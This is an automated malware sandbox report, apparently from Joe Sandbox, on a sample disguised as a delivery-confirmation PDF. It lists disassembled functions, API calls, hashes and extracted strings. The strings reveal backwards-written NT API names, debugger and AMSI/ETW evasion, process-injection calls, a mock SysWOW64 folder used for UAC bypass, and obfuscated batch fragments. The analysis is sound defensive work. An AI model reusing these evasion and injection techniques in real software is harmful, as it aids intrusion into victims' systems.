Function 02CE8254 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02CE8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CE8090,?,?,00000000,?,02CE7A06,ntdll,00000000,00000000,02CE7A4B,?,?,00000000), ref: 02CE805E
Part of subcall function 02CE8020: GetModuleHandleA.KERNELBASE(?), ref: 02CE8072

Part of subcall function 02CE80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(?,?), ref: 02CE812D

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CE82C5

Strings

ntdll, xrefs: 02CE829C
yromeMlautriVdaeRtN, xrefs: 02CE826F

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryReadVirtual
String ID: ntdll$yromeMlautriVdaeRtN
API String ID: 2521977463-737317276
Opcode ID: 272db0e167f880a8b86daf1364400924b90d87704e59733089b9d8d0dd98f58d
Instruction ID: 1161de7225802bc269344eb4561195d7712dd8edfd535c8ed5638a53300538f3
Opcode Fuzzy Hash: 272db0e167f880a8b86daf1364400924b90d87704e59733089b9d8d0dd98f58d
Instruction Fuzzy Hash: FF012975640209AFEF10EFA8D841E9E77EEEB48700F514960F609D7610DA30ED149B64

Function 02CE7D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02CE8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CE8090,?,?,00000000,?,02CE7A06,ntdll,00000000,00000000,02CE7A4B,?,?,00000000), ref: 02CE805E
Part of subcall function 02CE8020: GetModuleHandleA.KERNELBASE(?), ref: 02CE8072

Part of subcall function 02CE80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(?,?), ref: 02CE812D

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CE7D74

Strings

yromeMlautriVetirW, xrefs: 02CE7D1B
Ntdll, xrefs: 02CE7D4B

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryVirtualWrite
String ID: Ntdll$yromeMlautriVetirW
API String ID: 2719805696-3542721025
Opcode ID: e243d2b028791b9d16ee500363ab48e43e0af49580f61ee35aa780f01801b552
Instruction ID: 50f715fafdfab8189f5cec5ce750b58905c56205bae29b95a6db04310cc00069
Opcode Fuzzy Hash: e243d2b028791b9d16ee500363ab48e43e0af49580f61ee35aa780f01801b552
Instruction Fuzzy Hash: 52010C75600209AFEF10EFA8E841EAEB7EDEB48710F514860F60AD7750D670EE149F64

Function 02CE84C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02CE8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CE8090,?,?,00000000,?,02CE7A06,ntdll,00000000,00000000,02CE7A4B,?,?,00000000), ref: 02CE805E
Part of subcall function 02CE8020: GetModuleHandleA.KERNELBASE(?), ref: 02CE8072

Part of subcall function 02CE80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(?,?), ref: 02CE812D

NtUnmapViewOfSection.NTDLL(?,?), ref: 02CE8529

Strings

ntdll, xrefs: 02CE850C
noitceSfOweiVpamnUtN, xrefs: 02CE84DF

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: HandleModule$AddressProc$SectionUnmapView
String ID: noitceSfOweiVpamnUtN$ntdll
API String ID: 3503870465-2520021413
Opcode ID: c357517166e126c8d7039cee29f929ce610b0cd217d84518060ccc0bf2d05402
Instruction ID: 385c59ecc4b65b87accbc5146693d1455778a29f45769757d13bd22b54dfbcf2
Opcode Fuzzy Hash: c357517166e126c8d7039cee29f929ce610b0cd217d84518060ccc0bf2d05402
Instruction Fuzzy Hash: CB014F74640204AFEF14EBA4DC41A9E77AEEB49710F524960B54697650DA30EE119E24

Function 02CED9F0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON

Download Yara Rule

APIs

RtlInitUnicodeString.NTDLL(?,?), ref: 02CEDA6C
RtlDosPa.N(00000000,?,00000000,00000000,00000000,02CEDABE), ref: 02CEDA82
NtDeleteFile.NTDLL(?), ref: 02CEDAA1

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: DeleteFileInitStringUnicode
String ID:
API String ID: 3559453722-0
Opcode ID: 9db9663e32b827a0405ba8f2e251b28330269b3f58b25311ac64e5e319265cd9
Instruction ID: a2f91796a32e3a5ef8421a4502ab6a918e623360509b048ddca9a2dfd1edb94f
Opcode Fuzzy Hash: 9db9663e32b827a0405ba8f2e251b28330269b3f58b25311ac64e5e319265cd9
Instruction Fuzzy Hash: 87014B75A88348AEEF05EAA08941BCD77BDAB44704F5000A2A212E6081DB74AB049B25

Function 02CEDA44 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02CD4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02CD4EDA

RtlInitUnicodeString.NTDLL(?,?), ref: 02CEDA6C
RtlDosPa.N(00000000,?,00000000,00000000,00000000,02CEDABE), ref: 02CEDA82
NtDeleteFile.NTDLL(?), ref: 02CEDAA1

Part of subcall function 02CD4C0C: SysFreeString.OLEAUT32(02CEE950), ref: 02CD4C1A

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: String$AllocDeleteFileFreeInitUnicode
String ID:
API String ID: 2841551397-0
Opcode ID: 56da114b52dfe499ce9d1c0bf4eb4f31c3360b969fc3763069c8e36b6e6df51b
Instruction ID: 7b8832c0b7c5cb911f1ad19a802436468e98387f430078cadb0215813e339eb9
Opcode Fuzzy Hash: 56da114b52dfe499ce9d1c0bf4eb4f31c3360b969fc3763069c8e36b6e6df51b
Instruction Fuzzy Hash: CC01EC71A44208BAEB15EAE0CD52FCEB3BDEB48700F504471A602E2580EB75AB04AE64

Function 02CE6D50 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

Part of subcall function 02CE6CF4: CLSIDFromProgID.OLE32(00000000,?,00000000,02CE6D41,?,?,?,00000000), ref: 02CE6D21

CoCreateInstance.OLE32(?,00000000,00000005,02CE6E34,00000000,00000000,02CE6DB3,?,00000000,02CE6E23), ref: 02CE6D9F

Memory Dump Source

Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true

Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: 8138fa24d949272b2497f5c5f078b992e40345ab1f83ad9ab2d44c94431eb22f
Instruction ID: 895135b7c395a11d7ad1366ef83d0d77158a769ac1ae5c34199dadec29ff6a9c
Opcode Fuzzy Hash: 8138fa24d949272b2497f5c5f078b992e40345ab1f83ad9ab2d44c94431eb22f
Instruction Fuzzy Hash: 76012631218744AEFB15EF64DC5286FBBADEB59B10BB24435FA02E3680E6349E00D960

Function 02CEEC74 Relevance: 243.3, APIs: 11, Strings: 122, Instructions: 10535filesleepCOMMON

Download Yara Rule

APIs

InetIsOffline.URL(00000000,00000000,02CFAFA1,?,?,?,000002F7,00000000,00000000), ref: 02CEECAE

Part of subcall function 02CE8824: LoadLibraryA.KERNEL32(00000000,00000000,02CE890B), ref: 02CE8858
Part of subcall function 02CE8824: FreeLibrary.KERNEL32(74F60000,00000000,02D31388,Function_000065D8,00000004,02D31398,02D31388,05F5E0FF,00000040,02D3139C,74F60000,00000000,00000000,00000000,00000000,02CE890B), ref: 02CE88EB

Part of subcall function 02CEEB94: GetModuleHandleW.KERNEL32(KernelBase,?,02CEEF98,UacInitialize,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,ScanBuffer,02D3137C,02CFAFD8,ScanString,02D3137C,02CFAFD8,Initialize), ref: 02CEEB9A
Part of subcall function 02CEEB94: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02CEEBAC

Part of subcall function 02CEEBF0: GetModuleHandleW.KERNEL32(KernelBase), ref: 02CEEC00
Part of subcall function 02CEEBF0: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02CEEC12
Part of subcall function 02CEEBF0: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02CEEC29

Part of subcall function 02CD7E18: GetFileAttributesA.KERNEL32(00000000,?,02CEF8CC,ScanString,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,ScanString,02D3137C,02CFAFD8,UacScan,02D3137C,02CFAFD8,UacInitialize), ref: 02CD7E23

Part of subcall function 02CDC2EC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02E258C8,?,02CEFBFE,ScanBuffer,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,ScanBuffer,02D3137C,02CFAFD8,OpenSession), ref: 02CDC303

Part of subcall function 02CEDBB0: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02CEDC80), ref: 02CEDBEB
Part of subcall function 02CEDBB0: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02CEDC80), ref: 02CEDC1B
Part of subcall function 02CEDBB0: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02CEDC30
Part of subcall function 02CEDBB0: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02CEDC5C
Part of subcall function 02CEDBB0: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02CEDC65

Part of subcall function 02CD7E3C: GetFileAttributesA.KERNEL32(00000000,?,02CF2A49,ScanString,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,ScanBuffer,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,Initialize), ref: 02CD7E47

Part of subcall function 02CD7FD0: CreateDirectoryA.KERNEL32(00000000,00000000,?,02CF2BE7,OpenSession,02D3137C,02CFAFD8,ScanString,02D3137C,02CFAFD8,Initialize,02D3137C,02CFAFD8,ScanString,02D3137C,02CFAFD8), ref: 02CD7FDD

Part of subcall function 02CEDACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02CEDB9E), ref: 02CEDB0B
Part of subcall function 02CEDACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02CEDB45
Part of subcall function 02CEDACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02CEDB72
Part of subcall function 02CEDACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02CEDB7B

Part of subcall function 02CE87A0: LoadLibraryW.KERNEL32(bcrypt,?,00000864,00000000,02D313A4,02CEA3C7,ScanString,02D313A4,02CEA77C,ScanBuffer,02D313A4,02CEA77C,Initialize,02D313A4,02CEA77C,UacScan), ref: 02CE87B4
Part of subcall function 02CE87A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02CE87CE
Part of subcall function 02CE87A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000864,00000000,02D313A4,02CEA3C7,ScanString,02D313A4,02CEA77C,ScanBuffer,02D313A4,02CEA77C,Initialize), ref: 02CE880A

Part of subcall function 02CE870C: LoadLibraryW.KERNEL32(amsi), ref: 02CE8715
Part of subcall function 02CE870C: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02CE8774

Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,ScanBuffer,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,02CFB330), ref: 02CF49B7

Part of subcall function 02CEDA44: RtlInitUnicodeString.NTDLL(?,?), ref: 02CEDA6C
Part of subcall function 02CEDA44: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02CEDABE), ref: 02CEDA82
Part of subcall function 02CEDA44: NtDeleteFile.NTDLL(?), ref: 02CEDAA1

MoveFileA.KERNEL32(00000000,00000000), ref: 02CF4BB7
MoveFileA.KERNEL32(00000000,00000000), ref: 02CF4C0D

Strings

SLGatherMigrationBlob, xrefs: 02CFA543
C:\Windows\System32\, xrefs: 02CEF8B7, 02CF70BB, 02CF7E03
EtwEventWrite, xrefs: 02CFA873
CryptSIPGetInfo, xrefs: 02CEF241
smartscreenps, xrefs: 02CEF4FE, 02CEF531, 02CEF564
FX.c, xrefs: 02CF46FB
UacUninitialize, xrefs: 02CF2D1E, 02CF301B, 02CF3113, 02CF38F1, 02CF3F8B
CryptSIPGetSignedDataMsg, xrefs: 02CEF2A7
DllGetActivationFactory, xrefs: 02CEF51A
BCryptQueryProviderRegistration, xrefs: 02CEF389
C:\\Windows \\SysWOW64\\, xrefs: 02CF3ACE, 02CF3EE2
BCryptRegisterProvider, xrefs: 02CEF3BC
EnumServicesStatusA, xrefs: 02CFA0DD
NtQuerySystemInformation, xrefs: 02CFA0A1
NtQueryDirectoryFile, xrefs: 02CFA0BF
SLGetGenuineInformation, xrefs: 02CF959A
NtQuerySecurityObject, xrefs: 02CFA70E
IconIndex=, xrefs: 02CF64FD
WriteVirtualMemory, xrefs: 02CFA2D0
RtlCreateQueryDebugBuffer, xrefs: 02CF9E08
CreateProcessAsUserA, xrefs: 02CFA146
WinHttp.WinHttpRequest.5.1, xrefs: 02CF17E9
http, xrefs: 02CF15D5
GetProxyDllInfo, xrefs: 02CEEFD7
Kernel32, xrefs: 02CFA12D, 02CFA13C, 02CFA178
GET, xrefs: 02CF1902
NtOpenObjectAuditAlarm, xrefs: 02CF8976
sppwmi, xrefs: 02CFA527
Initialize, xrefs: 02CEEDAB, 02CEFCC9, 02CEFE5D, 02CEFFFB, 02CF01A1, 02CF0456, 02CF0AF9, 02CF0F35, 02CF13DF, 02CF14E9, 02CF1BD0, 02CF1F02, 02CF2222, 02CF2556, 02CF2704, 02CF2A5D, 02CF2E16, 02CF4FBE, 02CF5353, 02CF574F, 02CF5914, 02CF5B80, 02CF5CBE, 02CF5EC3, 02CF6E38, 02CF7AF0, 02CF8AFD, 02CF96E8, 02CF9A86, 02CF9FB5, 02CFA36F, 02CFA8BB
URL=file:", xrefs: 02CF64A7
dbgcore, xrefs: 02CF89A3, 02CF89B7
BCryptVerifySignature, xrefs: 02CEF356, 02CF99D1
lld.SLITUTEN, xrefs: 02CF3AB8
LdrLoadDll, xrefs: 02CFA774
GZmMS1j, xrefs: 02CEECBC
SetUnhandledExceptionFilter, xrefs: 02CFA336
NtWriteVirtualMemory, xrefs: 02CFA7DA
TrustOpenStores, xrefs: 02CEF0B0
VirtualAllocEx, xrefs: 02CFA237
mssip32, xrefs: 02CEF258, 02CEF28B, 02CEF2BE, 02CF98BD
EtwEventWriteEx, xrefs: 02CFA840
HotKey=, xrefs: 02CF6631
RtlAllocateHeap, xrefs: 02CF9D6F, 02CF9DD5
.url, xrefs: 02CF54DB
advapi32, xrefs: 02CF898F
GetProcessMemoryInfo, xrefs: 02CF9873
EnumProcessModules, xrefs: 02CFA119
DllRegisterServer, xrefs: 02CEF001, 02CEF54D
CreateProcessA, xrefs: 02CFA128
NEO.c, xrefs: 02CF4445
FlushInstructionCache, xrefs: 02CFA303
ScanString, xrefs: 02CEEE0F, 02CEF03A, 02CEF14F, 02CEF2E0, 02CEF471, 02CEF6FA, 02CEF83B, 02CEFDC1, 02CF09D9, 02CF0B75, 02CF0FB1, 02CF11CC, 02CF1248, 02CF1565, 02CF188B, 02CF1B54, 02CF1F91, 02CF23C2, 02CF25D2, 02CF2688, 02CF29B7, 02CF2AD9, 02CF2D9A, 02CF31E5, 02CF3CDD, 02CF4153, 02CF4348, 02CF4D00, 02CF4E9A, 02CF51DF, 02CF55A3, 02CF5C42, 02CF6428, 02CF659F, 02CF6657, 02CF6CC4, 02CF715E, 02CF75C5, 02CF7BE8, 02CF868F, 02CF8A81, 02CF8E6A, 02CF9226, 02CF9524, 02CF98DF, 02CF9CC6, 02CF9EBD, 02CFA467
ieproxy, xrefs: 02CEEFC1, 02CEEFE8, 02CEF018
psapi, xrefs: 02CFA11E
C:\\Users\\Public\\Libraries\\, xrefs: 02CF4B66, 02CF4BBC, 02CF58B7
MiniDumpReadDumpStream, xrefs: 02CF89B2
NtQueryVirtualMemory, xrefs: 02CFA5DC
psapi, xrefs: 02CF988A
spp, xrefs: 02CF9824, 02CF9857, 02CFA4F4
EnumServicesStatusExW, xrefs: 02CFA10A
bcrypt, xrefs: 02CEF36D, 02CEF3A0, 02CEF3D3, 02CF99E8
NtOpenSection, xrefs: 02CFA642
SLGetSLIDList, xrefs: 02CF95CD
NtOpenFile, xrefs: 02CFA80D
@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or, xrefs: 02CF4598
sys.thgiseurt, xrefs: 02CF3ECC
tquery, xrefs: 02CF97F1
NtReadVirtualMemory, xrefs: 02CFA6DB
SLGetEncryptedPIDEx, xrefs: 02CFA576
VirtualProtect, xrefs: 02CFA26A
RtlQueryProcessDebugInformation, xrefs: 02CFA0CE
DlpGetArchiveFileTraceInfo, xrefs: 02CF9BDE
C:\\Windows \\SysWOW64\\svchost.exe, xrefs: 02CF36A8
DllGetClassObject, xrefs: 02CEEFB0, 02CEF4E7, 02CF9840, 02CFA510
NtCreateSection, xrefs: 02CFA675
CreateProcessWithLogonW, xrefs: 02CFA164
CreateProcessAsUserW, xrefs: 02CFA155, 02CFA173
EnumServicesStatusW, xrefs: 02CFA0EC
NtGetWriteWatch, xrefs: 02CFA5A9
DlpCheckIsCloudSyncApp, xrefs: 02CF9BAB
NtWaitForSingleObject, xrefs: 02CF9DA2
DlpGetWebSiteAccess, xrefs: 02CF9C11
SxTracerGetThreadContextDebug, xrefs: 02CF980D, 02CFA4DD
LdrGetProcedureAddress, xrefs: 02CFA7A7
VirtualAlloc, xrefs: 02CFA204
sppc, xrefs: 02CF95B1, 02CF95E4, 02CF9617, 02CF964A, 02CFA55A, 02CFA58D
Advapi, xrefs: 02CFA0E2, 02CFA0F1, 02CFA100, 02CFA10F, 02CFA14B, 02CFA15A, 02CFA169
RetailTracerEnable, xrefs: 02CF97DA
@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%, xrefs: 02CF3361
OpenProcess, xrefs: 02CFA29D
CryptSIPVerifyIndirectData, xrefs: 02CEF274, 02CF98A6
[InternetShortcut], xrefs: 02CF6498
SLIsGenuineLocalEx, xrefs: 02CF9600
EnumServicesStatusExA, xrefs: 02CFA0FB
FindCertsByIssuer, xrefs: 02CEF116
WintrustAddActionID, xrefs: 02CEF0E3
NtOpenProcess, xrefs: 02CF89DA
@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%, xrefs: 02CF484E
wintrust, xrefs: 02CEF0C7, 02CEF0FA, 02CEF12D
ntdll, xrefs: 02CF897B, 02CF89CB, 02CF89DF, 02CF9D53, 02CF9D86, 02CF9DB9, 02CF9DEC, 02CF9E1F, 02CFA5C0, 02CFA5F3, 02CFA626, 02CFA659, 02CFA68C, 02CFA6BF, 02CFA6F2, 02CFA725, 02CFA758, 02CFA78B, 02CFA7BE, 02CFA7F1, 02CFA824, 02CFA857, 02CFA88A
OpenSession, xrefs: 02CEECE3, 02CEEED7, 02CEF7BF, 02CEF8E0, 02CEF9ED, 02CEFB05, 02CEFED9, 02CF0077, 02CF021D, 02CF033D, 02CF04D2, 02CF05CA, 02CF07B7, 02CF095D, 02CF0C8B, 02CF0EB9, 02CF102D, 02CF1150, 02CF12CE, 02CF1674, 02CF16F7, 02CF180F, 02CF1927, 02CF1A33, 02CF1C51, 02CF1D6E, 02CF200D, 02CF2089, 02CF229E, 02CF243E, 02CF2780, 02CF293B, 02CF2B55, 02CF2C6F, 02CF2F9F, 02CF343E, 02CF35B7, 02CF373A, 02CF3B77, 02CF3DD5, 02CF3F0F, 02CF424B, 02CF4493, 02CF4675, 02CF4749, 02CF48AF, 02CF4A44, 02CF4D7C, 02CF4F16, 02CF50B6, 02CF525B, 02CF53CF, 02CF561F, 02CF56D3, 02CF5990, 02CF5A88, 02CF5F3F, 02CF6219, 02CF638D, 02CF6523, 02CF66D3, 02CF6DBC, 02CF6FC1, 02CF71DA, 02CF727D, 02CF7410, 02CF77D8, 02CF7A74, 02CF7D71, 02CF7ECA, 02CF8070, 02CF81FD, 02CF8391, 02CF8510, 02CF8613, 02CF8787, 02CF8A05, 02CF8BF5, 02CF8EE6, 02CF906C, 02CF92A2, 02CF94A8, 02CF966C, 02CF995B, 02CF9A0A, 02CF9C4A, 02CF9E41, 02CF9F39, 02CFA3EB, 02CFA9B3
UacScan, xrefs: 02CEED47, 02CEF586, 02CEF67E, 02CEFC4D, 02CF0833, 02CF0E11, 02CF1773, 02CF1E86, 02CF3097, 02CF3261, 02CF33C2, 02CF353B, 02CF36BE, 02CF388F, 02CF396D, 02CF3AFB, 02CF4007, 02CF43C4, 02CF45F9, 02CF52D7, 02CF5847, 02CF5A0C, 02CF5D3A, 02CF5E47, 02CF60A5, 02CF619D, 02CF6D40, 02CF70E2, 02CF72F9, 02CF748C, 02CF76E0, 02CF7B6C, 02CF7CF5, 02CF7E4E, 02CF7FF4, 02CF8181, 02CF8315, 02CF8494, 02CF870B, 02CF8B79, 02CF8D93, 02CF8F74, 02CF90E8, 02CF931E, 02CFA18E
NtDeviceIoControlFile, xrefs: 02CFA0B0
I_QueryTagInformation, xrefs: 02CF898A
NtMapViewOfSection, xrefs: 02CFA6A8
NtAlertResumeThread, xrefs: 02CF9D3C
SLLoadApplicationPolicies, xrefs: 02CF9633
C:\Users\Public\alpha.pif, xrefs: 02CF4B36
C:\Users\Public\aken.pif, xrefs: 02CF4B51
DlpNotifyPreDragDrop, xrefs: 02CF9B78
kernel32, xrefs: 02CFA21B, 02CFA24E, 02CFA281, 02CFA2B4, 02CFA2E7, 02CFA31A, 02CFA34D
D2^Tyj}~TVrgoij[Dkcxn}dmu, xrefs: 02CEFE37
endpointdlp, xrefs: 02CF9B8F, 02CF9BC2, 02CF9BF5, 02CF9C28
UacInitialize, xrefs: 02CEEF3B, 02CEF602, 02CEFD45, 02CF3D59, 02CF41CF, 02CF49C8, 02CF4C84, 02CF503A, 02CF5527, 02CF703D, 02CF887F, 02CF8C9B
CreateProcessW, xrefs: 02CFA137
C:\Users\Public\, xrefs: 02CF3183, 02CF54D0, 02CF6743
NtQueryInformationThread, xrefs: 02CFA60F
Ntdll, xrefs: 02CFA0A6, 02CFA0B5, 02CFA0C4, 02CFA0D3
NtSetSecurityObject, xrefs: 02CF89C6
NtAccessCheck, xrefs: 02CFA741
